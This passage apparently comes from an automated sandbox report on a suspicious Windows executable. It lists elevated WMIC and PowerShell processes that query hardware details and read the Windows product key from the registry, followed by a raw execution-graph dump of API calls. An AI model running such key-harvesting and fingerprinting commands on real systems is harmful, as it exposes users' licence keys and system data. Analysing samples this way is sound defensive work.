Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 83
Start time: 03:42:31
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 84
Start time: 03:42:31
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 85
Start time: 03:42:31
Start date: 04/01/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff69e180000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 03:42:32
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 87
Start time: 03:42:32
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 88
Start time: 03:42:32
Start date: 04/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 24

[execution_graph: interactive node and edge listing omitted. API calls named in the listing include LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, GetModuleFileNameW, InitializeSListHead, IsProcessorFeaturePresent and GetStartupInfoW, alongside CRT routines such as memcpy_s, _invalid_parameter_noinfo, __free_lconv_num, _RTC_Initialize, __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, __std_exception_destroy and _CreateFrameInfo.]
15993 7ff78da53984 15992->15993 15994 7ff78da53962 15992->15994 15996 7ff78da51c80 49 API calls 15993->15996 16347 7ff78da600bc 15994->16347 15999 7ff78da539a3 15996->15999 16000 7ff78da58a20 14 API calls 15998->16000 16007 7ff78da538de __std_exception_destroy 15998->16007 16004 7ff78da51950 115 API calls 15999->16004 16000->16007 16002 7ff78da53a0b 16003 7ff78da58b90 40 API calls 16002->16003 16005 7ff78da53a17 16003->16005 16006 7ff78da539ce 16004->16006 16008 7ff78da58b90 40 API calls 16005->16008 16006->15985 16009 7ff78da539de 16006->16009 16013 7ff78da5390e __std_exception_destroy 16007->16013 16362 7ff78da58b30 16007->16362 16010 7ff78da53a23 16008->16010 16011 7ff78da52710 54 API calls 16009->16011 16012 7ff78da58b90 40 API calls 16010->16012 16019 7ff78da53808 __std_exception_destroy 16011->16019 16012->16013 16014 7ff78da58a20 14 API calls 16013->16014 16015 7ff78da53a3b 16014->16015 16016 7ff78da53b2f 16015->16016 16017 7ff78da53a60 __std_exception_destroy 16015->16017 16018 7ff78da52710 54 API calls 16016->16018 16020 7ff78da58b30 40 API calls 16017->16020 16031 7ff78da53aab 16017->16031 16018->16019 16369 7ff78da5c5c0 16019->16369 16020->16031 16021 7ff78da58a20 14 API calls 16022 7ff78da53bf4 __std_exception_destroy 16021->16022 16023 7ff78da53c46 16022->16023 16024 7ff78da53d41 16022->16024 16025 7ff78da53cd4 16023->16025 16026 7ff78da53c50 16023->16026 16378 7ff78da544d0 16024->16378 16029 7ff78da58a20 14 API calls 16025->16029 16244 7ff78da590e0 16026->16244 16033 7ff78da53ce0 16029->16033 16030 7ff78da53d4f 16034 7ff78da53d65 16030->16034 16035 7ff78da53d71 16030->16035 16031->16021 16036 7ff78da53c61 16033->16036 16040 7ff78da53ced 16033->16040 16381 7ff78da54620 16034->16381 16038 7ff78da51c80 49 API calls 16035->16038 16042 7ff78da52710 54 API calls 16036->16042 16048 7ff78da53cc8 __std_exception_destroy 16038->16048 16043 7ff78da51c80 49 API calls 16040->16043 16042->16019 16046 7ff78da53d0b 16043->16046 16044 7ff78da53dc4 16294 7ff78da59400 
16044->16294 16046->16048 16049 7ff78da53d12 16046->16049 16047 7ff78da53dd7 SetDllDirectoryW 16053 7ff78da53e0a 16047->16053 16096 7ff78da53e5a 16047->16096 16048->16044 16050 7ff78da53da7 SetDllDirectoryW LoadLibraryExW 16048->16050 16052 7ff78da52710 54 API calls 16049->16052 16050->16044 16052->16019 16055 7ff78da58a20 14 API calls 16053->16055 16054 7ff78da53ffc 16057 7ff78da54029 16054->16057 16058 7ff78da54006 PostMessageW GetMessageW 16054->16058 16062 7ff78da53e16 __std_exception_destroy 16055->16062 16056 7ff78da53f1b 16299 7ff78da533c0 16056->16299 16458 7ff78da53360 16057->16458 16058->16057 16065 7ff78da53ef2 16062->16065 16066 7ff78da53e4e 16062->16066 16069 7ff78da58b30 40 API calls 16065->16069 16066->16096 16384 7ff78da56db0 16066->16384 16069->16096 16074 7ff78da56fb0 FreeLibrary 16077 7ff78da5404f 16074->16077 16082 7ff78da53e81 16085 7ff78da53ea2 16082->16085 16097 7ff78da53e85 16082->16097 16405 7ff78da56df0 16082->16405 16085->16097 16424 7ff78da571a0 16085->16424 16096->16054 16096->16056 16097->16096 16440 7ff78da52a50 16097->16440 16106 7ff78da69bb3 16105->16106 16107 7ff78da69bd4 16105->16107 16106->15951 18696 7ff78da6a448 16107->18696 16110 7ff78da5d328 GetModuleHandleW 16111 7ff78da5d339 16110->16111 16111->15959 16113 7ff78da5d011 16112->16113 16114 7ff78da5cdd0 16113->16114 16115 7ff78da5d8f8 7 API calls 16113->16115 16114->15949 16115->16114 16117 7ff78da5d1c2 _isindst memcpy_s 16116->16117 16118 7ff78da5d1e1 RtlCaptureContext RtlLookupFunctionEntry 16117->16118 16119 7ff78da5d20a RtlVirtualUnwind 16118->16119 16120 7ff78da5d246 memcpy_s 16118->16120 16119->16120 16121 7ff78da5d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16120->16121 16122 7ff78da5d2c6 _isindst 16121->16122 16122->15947 16124 7ff78da5d90a 16123->16124 16125 7ff78da5d900 16123->16125 16124->15965 16129 7ff78da5dc94 16125->16129 16130 7ff78da5dca3 16129->16130 16131 7ff78da5d905 16129->16131 16137 7ff78da5ded0 16130->16137 16133 
7ff78da5dd00 16131->16133 16134 7ff78da5dd2b 16133->16134 16135 7ff78da5dd0e DeleteCriticalSection 16134->16135 16136 7ff78da5dd2f 16134->16136 16135->16134 16136->16124 16141 7ff78da5dd38 16137->16141 16142 7ff78da5de22 TlsFree 16141->16142 16147 7ff78da5dd7c __vcrt_InitializeCriticalSectionEx 16141->16147 16143 7ff78da5ddaa LoadLibraryExW 16145 7ff78da5ddcb GetLastError 16143->16145 16146 7ff78da5de49 16143->16146 16144 7ff78da5de69 GetProcAddress 16144->16142 16145->16147 16146->16144 16148 7ff78da5de60 FreeLibrary 16146->16148 16147->16142 16147->16143 16147->16144 16149 7ff78da5dded LoadLibraryExW 16147->16149 16148->16144 16149->16146 16149->16147 16151 7ff78da7a530 16150->16151 16151->15970 16151->16151 16154 7ff78da6f4f0 16152->16154 16153 7ff78da6f543 16471 7ff78da6a884 16153->16471 16154->16153 16156 7ff78da6f596 16154->16156 16481 7ff78da6f3c8 16156->16481 16158 7ff78da6f56c 16158->15974 16588 7ff78da5c8c0 16159->16588 16162 7ff78da536eb GetLastError 16595 7ff78da52c50 16162->16595 16163 7ff78da53710 16590 7ff78da592f0 FindFirstFileExW 16163->16590 16167 7ff78da5377d 16621 7ff78da594b0 16167->16621 16168 7ff78da53723 16610 7ff78da59370 CreateFileW 16168->16610 16169 7ff78da5c5c0 _log10_special 8 API calls 16172 7ff78da537b5 16169->16172 16172->16019 16181 7ff78da51950 16172->16181 16174 7ff78da5378b 16176 7ff78da52810 49 API calls 16174->16176 16178 7ff78da53706 16174->16178 16175 7ff78da53734 16613 7ff78da52810 16175->16613 16176->16178 16178->16169 16180 7ff78da5374c __vcrt_InitializeCriticalSectionEx 16180->16167 16182 7ff78da545b0 108 API calls 16181->16182 16183 7ff78da51985 16182->16183 16184 7ff78da51c43 16183->16184 16186 7ff78da57f80 83 API calls 16183->16186 16185 7ff78da5c5c0 _log10_special 8 API calls 16184->16185 16187 7ff78da51c5e 16185->16187 16188 7ff78da519cb 16186->16188 16187->15980 16187->15981 16230 7ff78da51a03 16188->16230 17026 7ff78da60744 16188->17026 16190 7ff78da600bc 74 API calls 16190->16184 16191 7ff78da519e5 16192 
7ff78da51a08 16191->16192 16193 7ff78da519e9 16191->16193 17030 7ff78da6040c 16192->17030 16194 7ff78da64f78 memcpy_s 11 API calls 16193->16194 16196 7ff78da519ee 16194->16196 17033 7ff78da52910 16196->17033 16199 7ff78da51a45 16204 7ff78da51a7b 16199->16204 16205 7ff78da51a5c 16199->16205 16200 7ff78da51a26 16201 7ff78da64f78 memcpy_s 11 API calls 16200->16201 16202 7ff78da51a2b 16201->16202 16203 7ff78da52910 54 API calls 16202->16203 16203->16230 16207 7ff78da51c80 49 API calls 16204->16207 16206 7ff78da64f78 memcpy_s 11 API calls 16205->16206 16208 7ff78da51a61 16206->16208 16209 7ff78da51a92 16207->16209 16210 7ff78da52910 54 API calls 16208->16210 16211 7ff78da51c80 49 API calls 16209->16211 16210->16230 16212 7ff78da51add 16211->16212 16213 7ff78da60744 73 API calls 16212->16213 16214 7ff78da51b01 16213->16214 16215 7ff78da51b35 16214->16215 16216 7ff78da51b16 16214->16216 16217 7ff78da6040c _fread_nolock 53 API calls 16215->16217 16218 7ff78da64f78 memcpy_s 11 API calls 16216->16218 16219 7ff78da51b4a 16217->16219 16220 7ff78da51b1b 16218->16220 16222 7ff78da51b6f 16219->16222 16223 7ff78da51b50 16219->16223 16221 7ff78da52910 54 API calls 16220->16221 16221->16230 17048 7ff78da60180 16222->17048 16224 7ff78da64f78 memcpy_s 11 API calls 16223->16224 16226 7ff78da51b55 16224->16226 16228 7ff78da52910 54 API calls 16226->16228 16228->16230 16229 7ff78da52710 54 API calls 16229->16230 16230->16190 16232 7ff78da58a2a 16231->16232 16233 7ff78da59400 2 API calls 16232->16233 16234 7ff78da58a49 GetEnvironmentVariableW 16233->16234 16235 7ff78da58a66 ExpandEnvironmentStringsW 16234->16235 16236 7ff78da58ab2 16234->16236 16235->16236 16238 7ff78da58a88 16235->16238 16237 7ff78da5c5c0 _log10_special 8 API calls 16236->16237 16239 7ff78da58ac4 16237->16239 16240 7ff78da594b0 2 API calls 16238->16240 16239->15991 16241 7ff78da58a9a 16240->16241 16242 7ff78da5c5c0 _log10_special 8 API calls 16241->16242 16243 7ff78da58aaa 16242->16243 16243->15991 16245 7ff78da590f5 
16244->16245 17266 7ff78da58760 GetCurrentProcess OpenProcessToken 16245->17266 16248 7ff78da58760 7 API calls 16249 7ff78da59121 16248->16249 16250 7ff78da5913a 16249->16250 16251 7ff78da59154 16249->16251 16252 7ff78da526b0 48 API calls 16250->16252 16253 7ff78da526b0 48 API calls 16251->16253 16254 7ff78da59152 16252->16254 16255 7ff78da59167 LocalFree LocalFree 16253->16255 16254->16255 16256 7ff78da59183 16255->16256 16259 7ff78da5918f 16255->16259 17276 7ff78da52b50 16256->17276 16258 7ff78da5c5c0 _log10_special 8 API calls 16260 7ff78da53c55 16258->16260 16259->16258 16260->16036 16261 7ff78da58850 16260->16261 16262 7ff78da58868 16261->16262 16263 7ff78da5888c 16262->16263 16264 7ff78da588ea GetTempPathW GetCurrentProcessId 16262->16264 16266 7ff78da58a20 14 API calls 16263->16266 17285 7ff78da525c0 16264->17285 16267 7ff78da58898 16266->16267 17292 7ff78da581c0 16267->17292 16272 7ff78da588d8 __std_exception_destroy 16293 7ff78da589c4 __std_exception_destroy 16272->16293 16274 7ff78da58918 __std_exception_destroy 16280 7ff78da58955 __std_exception_destroy 16274->16280 17289 7ff78da68bd8 16274->17289 16276 7ff78da588be __std_exception_destroy 16276->16264 16283 7ff78da588cc 16276->16283 16279 7ff78da5c5c0 _log10_special 8 API calls 16282 7ff78da53cbb 16279->16282 16285 7ff78da59400 2 API calls 16280->16285 16280->16293 16282->16036 16282->16048 16284 7ff78da52810 49 API calls 16283->16284 16284->16272 16286 7ff78da589a1 16285->16286 16287 7ff78da589d9 16286->16287 16288 7ff78da589a6 16286->16288 16289 7ff78da682a8 38 API calls 16287->16289 16290 7ff78da59400 2 API calls 16288->16290 16289->16293 16291 7ff78da589b6 16290->16291 16292 7ff78da682a8 38 API calls 16291->16292 16292->16293 16293->16279 16295 7ff78da59422 MultiByteToWideChar 16294->16295 16297 7ff78da59446 16294->16297 16295->16297 16298 7ff78da5945c __std_exception_destroy 16295->16298 16296 7ff78da59463 MultiByteToWideChar 16296->16298 16297->16296 16297->16298 16298->16047 16311 7ff78da533ce 
memcpy_s 16299->16311 16300 7ff78da5c5c0 _log10_special 8 API calls 16302 7ff78da53664 16300->16302 16301 7ff78da535c7 16301->16300 16302->16019 16318 7ff78da590c0 LocalFree 16302->16318 16304 7ff78da51c80 49 API calls 16304->16311 16305 7ff78da535e2 16307 7ff78da52710 54 API calls 16305->16307 16307->16301 16310 7ff78da535c9 16313 7ff78da52710 54 API calls 16310->16313 16311->16301 16311->16304 16311->16305 16311->16310 16312 7ff78da52a50 54 API calls 16311->16312 16316 7ff78da535d0 16311->16316 17581 7ff78da54550 16311->17581 17587 7ff78da57e10 16311->17587 17599 7ff78da51600 16311->17599 17647 7ff78da57110 16311->17647 17651 7ff78da54180 16311->17651 17695 7ff78da54440 16311->17695 16312->16311 16313->16301 16317 7ff78da52710 54 API calls 16316->16317 16317->16301 16320 7ff78da51ca5 16319->16320 16321 7ff78da649f4 49 API calls 16320->16321 16322 7ff78da51cc8 16321->16322 16322->15985 16324 7ff78da59400 2 API calls 16323->16324 16325 7ff78da58ba4 16324->16325 16326 7ff78da682a8 38 API calls 16325->16326 16327 7ff78da58bb6 __std_exception_destroy 16326->16327 16327->15998 16329 7ff78da545bc 16328->16329 16330 7ff78da59400 2 API calls 16329->16330 16331 7ff78da545e4 16330->16331 16332 7ff78da59400 2 API calls 16331->16332 16333 7ff78da545f7 16332->16333 17878 7ff78da66004 16333->17878 16336 7ff78da5c5c0 _log10_special 8 API calls 16337 7ff78da5392b 16336->16337 16337->15988 16338 7ff78da57f80 16337->16338 16339 7ff78da57fa4 16338->16339 16340 7ff78da60744 73 API calls 16339->16340 16345 7ff78da5807b __std_exception_destroy 16339->16345 16341 7ff78da57fc0 16340->16341 16341->16345 18270 7ff78da67938 16341->18270 16343 7ff78da60744 73 API calls 16346 7ff78da57fd5 16343->16346 16344 7ff78da6040c _fread_nolock 53 API calls 16344->16346 16345->15992 16346->16343 16346->16344 16346->16345 16348 7ff78da600ec 16347->16348 18285 7ff78da5fe98 16348->18285 16350 7ff78da60105 16350->15988 16352 7ff78da5c8c0 16351->16352 16353 7ff78da52734 GetCurrentProcessId 16352->16353 16354 
7ff78da51c80 49 API calls 16353->16354 16355 7ff78da52787 16354->16355 16356 7ff78da649f4 49 API calls 16355->16356 16357 7ff78da527cf 16356->16357 16358 7ff78da52620 12 API calls 16357->16358 16359 7ff78da527f1 16358->16359 16360 7ff78da5c5c0 _log10_special 8 API calls 16359->16360 16361 7ff78da52801 16360->16361 16361->16019 16363 7ff78da59400 2 API calls 16362->16363 16364 7ff78da58b4c 16363->16364 16365 7ff78da59400 2 API calls 16364->16365 16366 7ff78da58b5c 16365->16366 16367 7ff78da682a8 38 API calls 16366->16367 16368 7ff78da58b6a __std_exception_destroy 16367->16368 16368->16002 16370 7ff78da5c5c9 16369->16370 16371 7ff78da53ca7 16370->16371 16372 7ff78da5c950 IsProcessorFeaturePresent 16370->16372 16371->16110 16373 7ff78da5c968 16372->16373 18296 7ff78da5cb48 RtlCaptureContext 16373->18296 16379 7ff78da51c80 49 API calls 16378->16379 16380 7ff78da544ed 16379->16380 16380->16030 16382 7ff78da51c80 49 API calls 16381->16382 16383 7ff78da54650 16382->16383 16383->16048 16385 7ff78da56dc5 16384->16385 16386 7ff78da64f78 memcpy_s 11 API calls 16385->16386 16389 7ff78da53e6c 16385->16389 16387 7ff78da56dd2 16386->16387 16388 7ff78da52910 54 API calls 16387->16388 16388->16389 16390 7ff78da57330 16389->16390 18301 7ff78da51470 16390->18301 16392 7ff78da57358 16393 7ff78da54620 49 API calls 16392->16393 16403 7ff78da574a9 __std_exception_destroy 16392->16403 16394 7ff78da5737a 16393->16394 16395 7ff78da5737f 16394->16395 16396 7ff78da54620 49 API calls 16394->16396 16397 7ff78da52a50 54 API calls 16395->16397 16398 7ff78da5739e 16396->16398 16397->16403 16398->16395 16399 7ff78da54620 49 API calls 16398->16399 16400 7ff78da573ba 16399->16400 16400->16395 16401 7ff78da573c3 16400->16401 16402 7ff78da52710 54 API calls 16401->16402 16404 7ff78da57433 __std_exception_destroy memcpy_s 16401->16404 16402->16403 16403->16082 16404->16082 16415 7ff78da56e0c 16405->16415 16406 7ff78da5c5c0 _log10_special 8 API calls 16407 7ff78da56f41 16406->16407 16407->16085 16408 
7ff78da51840 45 API calls 16408->16415 16409 7ff78da56f9a 16411 7ff78da52710 54 API calls 16409->16411 16410 7ff78da51c80 49 API calls 16410->16415 16421 7ff78da56f2f 16411->16421 16412 7ff78da56f87 16414 7ff78da52710 54 API calls 16412->16414 16413 7ff78da54550 10 API calls 16413->16415 16414->16421 16415->16408 16415->16409 16415->16410 16415->16412 16415->16413 16416 7ff78da57e10 52 API calls 16415->16416 16417 7ff78da52a50 54 API calls 16415->16417 16418 7ff78da56f74 16415->16418 16420 7ff78da51600 118 API calls 16415->16420 16415->16421 16422 7ff78da56f5d 16415->16422 16416->16415 16417->16415 16419 7ff78da52710 54 API calls 16418->16419 16419->16421 16420->16415 16421->16406 16423 7ff78da52710 54 API calls 16422->16423 16423->16421 18331 7ff78da59070 16424->18331 16426 7ff78da571b9 16427 7ff78da59070 3 API calls 16426->16427 16428 7ff78da571cc 16427->16428 16429 7ff78da571ff 16428->16429 16430 7ff78da571e4 16428->16430 16441 7ff78da5c8c0 16440->16441 16442 7ff78da52a74 GetCurrentProcessId 16441->16442 16443 7ff78da51c80 49 API calls 16442->16443 16444 7ff78da52ac7 16443->16444 16445 7ff78da649f4 49 API calls 16444->16445 16446 7ff78da52b0f 16445->16446 16447 7ff78da52620 12 API calls 16446->16447 16448 7ff78da52b31 16447->16448 16449 7ff78da5c5c0 _log10_special 8 API calls 16448->16449 18407 7ff78da56350 16458->18407 16461 7ff78da53399 16467 7ff78da53670 16461->16467 16463 7ff78da53381 16463->16461 18475 7ff78da56040 16463->18475 16465 7ff78da5338d 16465->16461 16468 7ff78da5367e 16467->16468 16469 7ff78da5368f 16468->16469 18695 7ff78da59050 FreeLibrary 16468->18695 16469->16074 16488 7ff78da6a5cc 16471->16488 16475 7ff78da6a8bf 16475->16158 16587 7ff78da654dc EnterCriticalSection 16481->16587 16489 7ff78da6a5e8 GetLastError 16488->16489 16490 7ff78da6a623 16488->16490 16491 7ff78da6a5f8 16489->16491 16490->16475 16494 7ff78da6a638 16490->16494 16501 7ff78da6b400 16491->16501 16495 7ff78da6a66c 16494->16495 16496 7ff78da6a654 GetLastError SetLastError 
16494->16496 16495->16475 16497 7ff78da6a970 IsProcessorFeaturePresent 16495->16497 16496->16495 16498 7ff78da6a983 16497->16498 16579 7ff78da6a684 16498->16579 16502 7ff78da6b43a FlsSetValue 16501->16502 16503 7ff78da6b41f FlsGetValue 16501->16503 16504 7ff78da6b447 16502->16504 16507 7ff78da6a613 SetLastError 16502->16507 16505 7ff78da6b434 16503->16505 16503->16507 16518 7ff78da6ec08 16504->16518 16505->16502 16507->16490 16508 7ff78da6b456 16509 7ff78da6b474 FlsSetValue 16508->16509 16510 7ff78da6b464 FlsSetValue 16508->16510 16512 7ff78da6b492 16509->16512 16513 7ff78da6b480 FlsSetValue 16509->16513 16511 7ff78da6b46d 16510->16511 16525 7ff78da6a9b8 16511->16525 16531 7ff78da6af64 16512->16531 16513->16511 16519 7ff78da6ec19 memcpy_s 16518->16519 16520 7ff78da6ec4e HeapAlloc 16519->16520 16521 7ff78da6ec6a 16519->16521 16536 7ff78da73600 16519->16536 16520->16519 16523 7ff78da6ec68 16520->16523 16539 7ff78da64f78 16521->16539 16523->16508 16526 7ff78da6a9bd RtlFreeHeap 16525->16526 16530 7ff78da6a9ec 16525->16530 16527 7ff78da6a9d8 GetLastError 16526->16527 16526->16530 16528 7ff78da6a9e5 __free_lconv_num 16527->16528 16529 7ff78da64f78 memcpy_s 9 API calls 16528->16529 16529->16530 16530->16507 16565 7ff78da6ae3c 16531->16565 16542 7ff78da73640 16536->16542 16548 7ff78da6b338 GetLastError 16539->16548 16541 7ff78da64f81 16541->16523 16547 7ff78da70348 EnterCriticalSection 16542->16547 16549 7ff78da6b379 FlsSetValue 16548->16549 16554 7ff78da6b35c 16548->16554 16550 7ff78da6b38b 16549->16550 16553 7ff78da6b369 16549->16553 16552 7ff78da6ec08 memcpy_s 5 API calls 16550->16552 16551 7ff78da6b3e5 SetLastError 16551->16541 16555 7ff78da6b39a 16552->16555 16553->16551 16554->16549 16554->16553 16556 7ff78da6b3b8 FlsSetValue 16555->16556 16557 7ff78da6b3a8 FlsSetValue 16555->16557 16558 7ff78da6b3d6 16556->16558 16559 7ff78da6b3c4 FlsSetValue 16556->16559 16560 7ff78da6b3b1 16557->16560 16561 7ff78da6af64 memcpy_s 5 API calls 16558->16561 16559->16560 16562 
7ff78da6a9b8 __free_lconv_num 5 API calls 16560->16562 16563 7ff78da6b3de 16561->16563 16562->16553 16564 7ff78da6a9b8 __free_lconv_num 5 API calls 16563->16564 16564->16551 16577 7ff78da70348 EnterCriticalSection 16565->16577 16580 7ff78da6a6be _isindst memcpy_s 16579->16580 16581 7ff78da6a6e6 RtlCaptureContext RtlLookupFunctionEntry 16580->16581 16582 7ff78da6a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16581->16582 16583 7ff78da6a720 RtlVirtualUnwind 16581->16583 16586 7ff78da6a7a8 _isindst 16582->16586 16583->16582 16584 7ff78da5c5c0 _log10_special 8 API calls 16585 7ff78da6a7c7 GetCurrentProcess TerminateProcess 16584->16585 16586->16584 16589 7ff78da536bc GetModuleFileNameW 16588->16589 16589->16162 16589->16163 16591 7ff78da5932f FindClose 16590->16591 16592 7ff78da59342 16590->16592 16591->16592 16593 7ff78da5c5c0 _log10_special 8 API calls 16592->16593 16594 7ff78da5371a 16593->16594 16594->16167 16594->16168 16596 7ff78da5c8c0 16595->16596 16597 7ff78da52c70 GetCurrentProcessId 16596->16597 16626 7ff78da526b0 16597->16626 16599 7ff78da52cb9 16630 7ff78da64c48 16599->16630 16602 7ff78da526b0 48 API calls 16603 7ff78da52d34 FormatMessageW 16602->16603 16605 7ff78da52d6d 16603->16605 16606 7ff78da52d7f MessageBoxW 16603->16606 16607 7ff78da526b0 48 API calls 16605->16607 16608 7ff78da5c5c0 _log10_special 8 API calls 16606->16608 16607->16606 16609 7ff78da52daf 16608->16609 16609->16178 16611 7ff78da53730 16610->16611 16612 7ff78da593b0 GetFinalPathNameByHandleW CloseHandle 16610->16612 16611->16175 16611->16180 16612->16611 16614 7ff78da52834 16613->16614 16615 7ff78da526b0 48 API calls 16614->16615 16616 7ff78da52887 16615->16616 16617 7ff78da64c48 48 API calls 16616->16617 16618 7ff78da528d0 MessageBoxW 16617->16618 16619 7ff78da5c5c0 _log10_special 8 API calls 16618->16619 16620 7ff78da52900 16619->16620 16620->16178 16622 7ff78da594da WideCharToMultiByte 16621->16622 16623 7ff78da59505 16621->16623 16622->16623 16625 
7ff78da5951b __std_exception_destroy 16622->16625 16624 7ff78da59522 WideCharToMultiByte 16623->16624 16623->16625 16624->16625 16625->16174 16627 7ff78da526d5 16626->16627 16628 7ff78da64c48 48 API calls 16627->16628 16629 7ff78da526f8 16628->16629 16629->16599 16631 7ff78da64ca2 16630->16631 16632 7ff78da64cc7 16631->16632 16633 7ff78da64d03 16631->16633 16634 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16632->16634 16648 7ff78da63000 16633->16648 16636 7ff78da64cf1 16634->16636 16639 7ff78da5c5c0 _log10_special 8 API calls 16636->16639 16637 7ff78da64de4 16638 7ff78da6a9b8 __free_lconv_num 11 API calls 16637->16638 16638->16636 16641 7ff78da52d04 16639->16641 16641->16602 16642 7ff78da64e0a 16642->16637 16645 7ff78da64e14 16642->16645 16643 7ff78da64db9 16646 7ff78da6a9b8 __free_lconv_num 11 API calls 16643->16646 16644 7ff78da64db0 16644->16637 16644->16643 16647 7ff78da6a9b8 __free_lconv_num 11 API calls 16645->16647 16646->16636 16647->16636 16649 7ff78da6303e 16648->16649 16650 7ff78da6302e 16648->16650 16651 7ff78da63047 16649->16651 16656 7ff78da63075 16649->16656 16652 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16650->16652 16653 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16651->16653 16654 7ff78da6306d 16652->16654 16653->16654 16654->16637 16654->16642 16654->16643 16654->16644 16656->16650 16656->16654 16659 7ff78da63a14 16656->16659 16692 7ff78da63460 16656->16692 16729 7ff78da62bf0 16656->16729 16660 7ff78da63ac7 16659->16660 16661 7ff78da63a56 16659->16661 16664 7ff78da63acc 16660->16664 16665 7ff78da63b20 16660->16665 16662 7ff78da63a5c 16661->16662 16663 7ff78da63af1 16661->16663 16666 7ff78da63a90 16662->16666 16667 7ff78da63a61 16662->16667 16752 7ff78da61dc4 16663->16752 16668 7ff78da63ace 16664->16668 16669 7ff78da63b01 16664->16669 16671 7ff78da63b37 16665->16671 16673 7ff78da63b2a 16665->16673 16677 7ff78da63b2f 16665->16677 16674 7ff78da63a67 16666->16674 16666->16677 16667->16671 16667->16674 16672 7ff78da63a70 
16668->16672 16681 7ff78da63add 16668->16681 16759 7ff78da619b4 16669->16759 16766 7ff78da6471c 16671->16766 16690 7ff78da63b60 16672->16690 16732 7ff78da641c8 16672->16732 16673->16663 16673->16677 16674->16672 16680 7ff78da63aa2 16674->16680 16688 7ff78da63a8b 16674->16688 16677->16690 16770 7ff78da621d4 16677->16770 16680->16690 16742 7ff78da64504 16680->16742 16681->16663 16682 7ff78da63ae2 16681->16682 16682->16690 16748 7ff78da645c8 16682->16748 16684 7ff78da5c5c0 _log10_special 8 API calls 16685 7ff78da63e5a 16684->16685 16685->16656 16688->16690 16691 7ff78da63d4c 16688->16691 16777 7ff78da64830 16688->16777 16690->16684 16691->16690 16783 7ff78da6ea78 16691->16783 16693 7ff78da6346e 16692->16693 16694 7ff78da63484 16692->16694 16696 7ff78da634c4 16693->16696 16697 7ff78da63ac7 16693->16697 16698 7ff78da63a56 16693->16698 16695 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16694->16695 16694->16696 16695->16696 16696->16656 16701 7ff78da63acc 16697->16701 16702 7ff78da63b20 16697->16702 16699 7ff78da63a5c 16698->16699 16700 7ff78da63af1 16698->16700 16703 7ff78da63a90 16699->16703 16704 7ff78da63a61 16699->16704 16707 7ff78da61dc4 38 API calls 16700->16707 16705 7ff78da63ace 16701->16705 16706 7ff78da63b01 16701->16706 16708 7ff78da63b37 16702->16708 16710 7ff78da63b2a 16702->16710 16714 7ff78da63b2f 16702->16714 16711 7ff78da63a67 16703->16711 16703->16714 16704->16708 16704->16711 16709 7ff78da63a70 16705->16709 16717 7ff78da63add 16705->16717 16712 7ff78da619b4 38 API calls 16706->16712 16724 7ff78da63a8b 16707->16724 16715 7ff78da6471c 45 API calls 16708->16715 16713 7ff78da641c8 47 API calls 16709->16713 16727 7ff78da63b60 16709->16727 16710->16700 16710->16714 16711->16709 16718 7ff78da63aa2 16711->16718 16711->16724 16712->16724 16713->16724 16716 7ff78da621d4 38 API calls 16714->16716 16714->16727 16715->16724 16716->16724 16717->16700 16719 7ff78da63ae2 16717->16719 16720 7ff78da64504 46 API calls 16718->16720 16718->16727 16722 7ff78da645c8 
